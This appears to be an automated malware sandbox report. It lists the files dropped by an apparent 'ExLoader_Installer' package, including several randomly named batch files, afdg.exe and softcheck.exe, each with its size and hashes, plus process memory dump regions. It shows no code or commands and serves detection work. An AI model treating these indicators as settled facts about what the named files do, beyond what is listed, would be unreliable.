23e5c1de45bbff1b18f1a4e15450f2a1

SHA1
acb369aec68a16e9c2539028b2e833a22a03e7a6

SHA256
80b89a84e561d424afdecd1e3ab4d92df9e1ba8056fabe55d76617870bb67a70

SHA512
7ecb97f5ff3e676cc3a5be651ff64c4ceaf7c39096e26fdffd947c78465868e291791e9ee2898a4b98d44f721fe38ef12eb8d2bb760d1bf91f766c8f480148c8

Download Submit
C:\Users\Admin\AppData\Local\Temp\K3fI8Bd254.bat

Filesize
205B

MD5
93360001a160f7cd0b1582fcbbd4b16d

SHA1
56230ce852e88d368dc891adfcfd28020666e3f6

SHA256
e2256856e49d9852e56faddd07b4e31a2de054268c9d6e5fd514771f65830e39

SHA512
7172d14be996ef410d6ef93f0fe73ad73e23a3ccb438bcfa957b008964fd5a8fe1d6efb930c79ed4207d4de693343b00cc5852947006b4cccd97070d1ffc79fd

Download Submit
C:\Users\Admin\AppData\Local\Temp\NHYDEKme3A.bat

Filesize
205B

MD5
7f33091405cd67a738d477434b7e6194

SHA1
e6d29066bb5807ee566dd1ca97df17b6cda7d3ea

SHA256
f694baf8dd0ac723a1772e9e0dac127b9d5e089d1fce69edc1d472a6aed329e1

SHA512
00b17d872239933b7e8b73727c37ab23950b2413263bd4ae94ebb5896d2fb87130f3fd008551fca826f6d75634a3a3f8a3ca87b5dc2c1cd2655d036ea6c45074

Download Submit
C:\Users\Admin\AppData\Local\Temp\P9uKrkSNlp.bat

Filesize
205B

MD5
a6360f4de14338df87a0b5dec9104d85

SHA1
b5c0f11efd38e159d2cd3298372c1c4b2927eb82

SHA256
92cf2b2732c7c69a4cb4e2164c4a02ac4dd7b78f9b50233144bffdced26327d4

SHA512
ec97188b2f1a47bf83fa1d64cee9daa88010a277880f0e26ce18e7e74e53f2a820c94c44da093dd5941bceb5fc5edfbdf5a94418982c5dd6a8712fe616eb48bc

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\ExLoader_Installer.exe

Filesize
183KB

MD5
afaa67445bd6bc3377cd5c56fdb934d0

SHA1
68e4f2cefda7f58478468c5adeeedef3378abae1

SHA256
53f5c7bab6cdb50b104882f9ac8ee9e5929b58ef0b392dc5f48c1622f737f002

SHA512
db5c7d7e5881ede8a9a6e4d09771dad592a68e7367a42700919cd37ad443badb8c0729cbcc75b9ac25ff65cdc06246b9e72962ebbcbddb1c24a522f8e5c7cd24

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\d3dcompiler_47.dll

Filesize
4.7MB

MD5
cb9807f6cf55ad799e920b7e0f97df99

SHA1
bb76012ded5acd103adad49436612d073d159b29

SHA256
5653bc7b0e2701561464ef36602ff6171c96bffe96e4c3597359cd7addcba88a

SHA512
f7c65bae4ede13616330ae46a197ebad106920dce6a31fd5a658da29ed1473234ca9e2b39cc9833ff903fb6b52ff19e39e6397fac02f005823ed366ca7a34f62

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\data\app.so

Filesize
13.3MB

MD5
935a9bb3e32863ec80f0a1708ca4bbc6

SHA1
05c7927c554ec0602be364b093088a5374fc3302

SHA256
5af71dcf454c0964d10be8a060475b7dae0435c2f97a458735ad92ffba51dd4f

SHA512
be0f63a120ee503a54d095078744208028e353f7708818146ab1aa90492b1d82c68b3ba0fa1b2946c46f9829b4db61d33c8734c11a4efce364e145ea6a406c19

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\data\flutter_assets\AssetManifest.bin

Filesize
14KB

MD5
4e304eaf6a0fe86df52d2b7e269b37ba

SHA1
8ac2a261522eed0c8e8b42f248b809bc657cc704

SHA256
5ed623d8a439b6b4a3f85edd7970bbc47e8040a5379e999d80161b087b3c795d

SHA512
d51b943122c135b6ea56ebc7ce54dd2efd28a05cbdc7664d195e29cf2337b8ac0f4e0c442ba0f89f527404fa3930f50607083f69cffef41910883a9c33efc162

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\data\flutter_assets\FontManifest.json

Filesize
413B

MD5
fb1230bb41c3c1290008b9e44059dd39

SHA1
66493d0f8a6a112d8376cd296b05c277b111dca1

SHA256
2429b610ba9010211d18626d311d3dea7274473c2dd50fae833ed739b67b1292

SHA512
d5ae9b9124a7c7f8c3d04c4750459c9bc620e3aeb84f5d56a64308eb9b343d4fb62f8b3e03210e04ad90b91bbbb35dd1a56148d06dbcc0872f99e9b1b9d37c7c

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\data\flutter_assets\resources\backgrounds\Ori%20and%20the%20Blind%20Forest.jpg

Filesize
93KB

MD5
babd1b019be8944f7ef6c64c8194bc8d

SHA1
702a50d3e3a0933db4dc1f37423bca3b5c52acde

SHA256
71ea07c900e7993072f4896c0ab621303feaf4d13b7c9a4b2993e06122b10f76

SHA512
6a854fc0db7206dd182f6ebc594d763b62a75f64663d3e58029cfa2586048838fe8878b043d174923e05f4e3cd2f3e9d96a6dcf5ba8bbd7322bbc3540bbb8b0d

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\data\flutter_assets\resources\fonts\NoirPro-Bold.otf

Filesize
46KB

MD5
e57b6bc24b970a377574124e026a7c01

SHA1
00184aedd4ee4d2ca6b5c87cf41e78f64304c89b

SHA256
b012d85155925bbe2106b20234b96522dec7914f03b09bc6e2fff71554f31bf6

SHA512
c162cd8a7130d2c94dac5c3dad58794f368436cbf782e8063c245d4cae405af6aa25c2f381549defd520c3f7cdbc04a27f891798697e9c291317d3b3ba82efdc

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\data\flutter_assets\resources\fonts\NoirPro-Light.otf

Filesize
45KB

MD5
d10d77b03ba3abe6ccc1c142d9852595

SHA1
6108edf0cfb3d5f25e3c593949c301c5c2aa5f25

SHA256
3c9ef459625f995c62b993b64da299204b741e153ba8e6d988463aaa86b1aa44

SHA512
71c4fc3b6f43b4125c5ea5ae09297d72446de81ffc2928fee33aef386754e60dab11cc170c4d6689dd6eeac451f2a57b9d3372278f750dca6ed39ec82fcf9368

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\data\flutter_assets\resources\fonts\NoirPro-Medium.otf

Filesize
46KB

MD5
df63e8855d04ab0e25d2bb6a0b1fabfb

SHA1
5512dc285f36cdf7da5ba5eabaca128ca3442537

SHA256
a728e91375dcadbdf6ef6d7e3cd0bbf5c56fb992d5b1be6640b83214c9d015ed

SHA512
eba8afd3289089841e4eda4abd992c2e2020d18d44741733b5a51a2a1e0c0982ffd9da187aa56ba3b891bc259398ec156e08e45265f7218e87eb914794ca69d6

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\data\flutter_assets\resources\fonts\NoirPro-Regular.otf

Filesize
45KB

MD5
d969db6adb881f1dfa91a5b7ec0154d9

SHA1
d7b44b20eb246b0ff5c41147c0d0fb96fde47c48

SHA256
c7fc6d9f2ff611073fa09a6c61a8c086da0ebe8da841a9f4ec4087a3e9b52152

SHA512
2a225a8c12b46aa14e14dd547c6a55c80aef6bfe8cc791dcf60a14ef91994eddc4dec473d856f7c2446d62a41d017d256b64b603d87ae45e75fdeb2230deb5b2

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\data\flutter_assets\resources\fonts\NoirPro-SemiBold.otf

Filesize
46KB

MD5
5177edfb54762b59df676052d11b363d

SHA1
fa18815bf4914b93d587c2758b65e234ad51b38b

SHA256
50000ce2f0f8bf3018f1d04aa5c6716583b808ca05c802c46a9de4f084a91f7d

SHA512
7475fe248eafd528a05acab94f3973eeeb0d169203769ee6b42d007b5fa0605a58a290e145d74d57e17486367bacffed22e4a88e576fa9f65d000e487aa78e27

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\data\flutter_assets\resources\icons\close.svg

Filesize
201B

MD5
7f8d672a2849987b498734dcb90f0c51

SHA1
e53b9319bf964c15099080ac5497ee39f8bab362

SHA256
4a290648cd1cfaaf1db4909d7552ae8cb83cb0b0e36770e64d153ab07ce6e7d4

SHA512
b3ddbf719f42440238c55cee896409179b4562ffe74f607d3640f623c8264c2fd2000b085dfd9a25ffd8ba2166695dcd663efec56cdac679f9993cfb602459d4

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\data\flutter_assets\resources\icons\cloud-off.svg

Filesize
1KB

MD5
e99140f842b471d330fc27cd73817c4c

SHA1
9957147463f586824b65bc7bfb121d33a9523a96

SHA256
0f4cb470185e3c6c26ae033a3a88e3995340bb08a63432dd9ebb82b73dd665ae

SHA512
f579aef41980539675609c62ff4d80dde22bad59917d439dbd4d325173bed3f24534a72e9903aef58c6ee5d4b03fcb7d0a7be8c93c35da6dbb2e1e046b7da0f2

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\data\flutter_assets\resources\icons\window-minimize.svg

Filesize
151B

MD5
d47255b6d3e685cac4804eb58207d0b6

SHA1
7fe02211cf6b77f3971522a3b3888460491ae153

SHA256
29bc4875912360fac26586adaca21449026cc2cf6479f9d9bbb066abe2dd2640

SHA512
b39c96fd2479585b32146a3b33a5419f665391f1b1857b08896c8254b48fdb733551bd9974a3c7dcfb679cbb5b35ed9b8f538f5c44156d399b02b8d0d4fe95ef

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\data\flutter_assets\resources\images\grain.png

Filesize
79KB

MD5
3577f702479e7f31a32a96f38a36e752

SHA1
e407b9ac4cfe3270cdd640a5018bec2178d49bb1

SHA256
cc453dfe977598a839a52037ef947388e008e5cdfe91b1f1a4e85afb5509bee2

SHA512
1a4a03931ab56c8352382414f55eb25b324e11890d51ba95597dbd867b35db45db5adcefb47d95b3763f413a66e3228e59531bdbd5ba5541469196adb5eb3d70

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\data\icudtl.dat

Filesize
798KB

MD5
da48e432fe61f451154f0715b2a7b174

SHA1
51b6add0bbc4e0b5200b01deca5d009f1daf9f39

SHA256
65ea729083128dfce1c00726ba932b91aaaf5e48736b5644dd37478e5f2875ac

SHA512
5af9c1e43b52536272a575ca400a9eee830a8fcecb83bb1a490515851bef48957d8de669b9f77b8614eb586838af23385e1afce622edb82a90ec7549f882d381

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\flutter_windows.dll

Filesize
17.3MB

MD5
cf1901e6b6a138422e4eb765ec20e098

SHA1
3cbde7f32504cbc0795e536a024e61fa2185ced2

SHA256
615038c51ea1655b6b8f057ac16f725d51b395efe76fa96cfb97924b0d908297

SHA512
82e19d116db7ae553d66511c2255728d1651919ffe83ca87f79a9e00f7d7085665ce5303c48729e7941e33aa91f65ad4d17fd30101e9865e76c8a2540d0af7e7

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\msvcp140.dll

Filesize
559KB

MD5
c3d497b0afef4bd7e09c7559e1c75b05

SHA1
295998a6455cc230da9517408f59569ea4ed7b02

SHA256
1e57a6df9e3742e31a1c6d9bff81ebeeae8a7de3b45a26e5079d5e1cce54cd98

SHA512
d5c62fdac7c5ee6b2f84b9bc446d5b10ad1a019e29c653cfdea4d13d01072fdf8da6005ad4817044a86bc664d1644b98a86f31c151a3418be53eb47c1cfae386

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\vcruntime140.dll

Filesize
116KB

MD5
e9b690fbe5c4b96871214379659dd928

SHA1
c199a4beac341abc218257080b741ada0fadecaf

SHA256
a06c9ea4f815dac75d2c99684d433fbfc782010fae887837a03f085a29a217e8

SHA512
00cf9b22af6ebbc20d1b9c22fc4261394b7d98ccad4823abc5ca6fdac537b43a00db5b3829c304a85738be5107927c0761c8276d6cb7f80e90f0a2c991dbcd8c

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\vcruntime140_1.dll

Filesize
48KB

MD5
eb49c1d33b41eb49dfed58aafa9b9a8f

SHA1
61786eb9f3f996d85a5f5eea4c555093dd0daab6

SHA256
6d3a6cde6fc4d3c79aabf785c04d2736a3e2fd9b0366c9b741f054a13ecd939e

SHA512
d15905a3d7203b00181609f47ce6e4b9591a629f2bf26ff33bf964f320371e06d535912fda13987610b76a85c65c659adac62f6b3176dbca91a01374178cd5c6

Download Submit
C:\Users\Admin\AppData\Local\Temp\U4eMIZxK0W.bat

Filesize
205B

MD5
ce14d0f8cc4b54ab36f166294a930bf8

SHA1
ea471536d4dfcbcb4907cbe2480858b6898c5310

SHA256
87e0c9293759aed57caa66bf72b35400eb0137f1c5e501aaa3893d0ec3304fc1

SHA512
93637a7863096b3ce5ebf70122a0b7dcdd0350dc8737b95b25f266061b2c0e548c855a09baecfdec168f020a7066a46cd6a8b45363a457f0cfeeb76d1f66faec

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qwyijmpi.wgv.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\afdg.exe

Filesize
229KB

MD5
03400301f58b640d2270f7e031de2709

SHA1
1ec27e75bf4fb7c5acc3b46eb542f5769047c6a6

SHA256
4bb46d9afffc0744a176ff631b1676e23af6f6f1776adc064f5d0ae9dd3b6a66

SHA512
7f682ff2eca030edc92ca67c5e6cdcd8a70a8be3ad123cb0388cb06039b8153d54128ce85945c42792dea86b4812b8d0ba7fc627dd0b57560e6859e1c416b518

Download Submit
C:\Users\Admin\AppData\Local\Temp\axBdnWD1Gl.bat

Filesize
205B

MD5
544c2ac55dea4fb9e700613df0eaee02

SHA1
1bb56333687705dca450892eee09619eaa88705a

SHA256
59c004830f5bebcb39db4fe88c9726d27de13ef646110f15b5d3deded55ee11f

SHA512
5d5c6fcfb2f0ca11b3143bd81a9c9bda07f4f207f8d69baa1450e5b9feb24f57a88412e8709e20af14075067a55e87b64c2a0f6783c5d31c9df13a8c885c107c

Download Submit
C:\Users\Admin\AppData\Local\Temp\c0ZYbu3Enn.bat

Filesize
205B

MD5
5548b6ae2df492e31b23e47e85cfca0d

SHA1
df446e701daf4fc4b3357faf96101e479b8f92f0

SHA256
41c2c9fedf91f67b193cd876b1b65c596d87657420c90bb3c6f0bae517aeeee0

SHA512
74238fa1bd4606c7763405ab9deddf88116682b14006f6d5c1b1b7c19060a77f1a0a78903c75718981efb96e987a079e712274fa5fedd8c7589729a099e1e390

Download Submit
C:\Users\Admin\AppData\Local\Temp\softcheck.exe

Filesize
1.5MB

MD5
836ec0990b84d743fe6b1ede5562a296

SHA1
e20ea1e584d09c30aa18f72280aedd4caf02df56

SHA256
4dc98610abc00825a886fd1df758c458170ed2442b1e5a096b4c0b3b70031a26

SHA512
3b33d7fb3266e669b38155c770fc6909702321434fe55ba0be83e8e82a7cf8d9cc19a2eff943ee60d77b810dcd194ef9cc6fe76972c7e5865cc5d306076d29ea

Download Submit
C:\Users\Admin\AppData\Local\Temp\uSuCPwp4Rh.bat

Filesize
205B

MD5
86c74508df6cbff7348512813682826b

SHA1
65750878ef8e2edd5541853fcb2d87c5b4fb9920

SHA256
f5d160b680a52a33c5ca57333e6eaecf2c5641c84f1eb848e8d6d51bea93bf3d

SHA512
fbcfb2d5984d2ba9a87811694d4ff25320cdf49f3c38765c91ad77f9d11660200f11d25562cac814463052a5775844326d221d672579e0cc9cc1eb161277fedd

Download Submit
C:\Users\Admin\AppData\Roaming\com.swiftsoft\ExLoader_Installer\shared_preferences.json

Filesize
269B

MD5
4d1eb9950ce3ae22d2b7b78f4170fbbe

SHA1
211250aa81c8d312968637ccf5fe99993cbdc333

SHA256
4e4de2f72553e7e4d92bbde4ca7a0f07c777f7c7612c9dadd5db57230b242a0b

SHA512
7935fecbe14e507e92c34263eae70e4036fcc5f1d99d5354f48b5cef8155743a06082f4214f88c55067a839587d2929a07b6012d80ef989fb393e7f56fd73e5d

Download Submit
memory/1568-696-0x000000001D650000-0x000000001D803000-memory.dmp

Filesize
1.7MB

Download
memory/2068-597-0x0000000000680000-0x00000000007B2000-memory.dmp

Filesize
1.2MB

Download
memory/2068-598-0x000000001B430000-0x000000001B44C000-memory.dmp

Filesize
112KB

Download
memory/2068-600-0x000000001B470000-0x000000001B47C000-memory.dmp

Filesize
48KB

Download
memory/2068-599-0x000000001B450000-0x000000001B466000-memory.dmp

Filesize
88KB

Download
memory/2312-502-0x00000251FD1A0000-0x00000251FDEF1000-memory.dmp

Filesize
13.3MB

Download
memory/2312-503-0x00000251FD1A0000-0x00000251FDEF1000-memory.dmp

Filesize
13.3MB

Download
memory/2312-504-0x00000251FD1A0000-0x00000251FDEF1000-memory.dmp

Filesize
13.3MB

Download
memory/2312-505-0x00000251FAC00000-0x00000251FAC01000-memory.dmp

Filesize
4KB

Download
memory/2312-501-0x00000251FABF0000-0x00000251FABF1000-memory.dmp

Filesize
4KB

Download
memory/2580-58-0x00000262CBAA0000-0x00000262CBAC2000-memory.dmp

Filesize
136KB

Download
memory/2940-578-0x00000267AE0C0000-0x00000267AE0D2000-memory.dmp

Filesize
72KB

Download
memory/2940-22-0x00007FF9C45F0000-0x00007FF9C50B2000-memory.dmp

Filesize
10.8MB

Download
memory/2940-21-0x00000267938B0000-0x00000267938F0000-memory.dmp

Filesize
256KB

Download
memory/2940-607-0x00007FF9C45F0000-0x00007FF9C50B2000-memory.dmp

Filesize
10.8MB

Download
memory/2940-577-0x0000026795860000-0x000002679586A000-memory.dmp

Filesize
40KB

Download
memory/2940-513-0x00000267956D0000-0x00000267956EE000-memory.dmp

Filesize
120KB

Download
memory/2940-511-0x00000267AE0F0000-0x00000267AE166000-memory.dmp

Filesize
472KB

Download
memory/2940-512-0x00000267AE070000-0x00000267AE0C0000-memory.dmp

Filesize
320KB

Download
memory/4584-41-0x00007FF9C45F0000-0x00007FF9C50B2000-memory.dmp

Filesize
10.8MB

Download
memory/4584-7-0x00007FF9C45F0000-0x00007FF9C50B2000-memory.dmp

Filesize
10.8MB

Download
memory/4584-0-0x00007FF9C45F3000-0x00007FF9C45F5000-memory.dmp

Filesize
8KB

Download
memory/4584-1-0x0000000000990000-0x0000000002004000-memory.dmp

Filesize
22.5MB

Download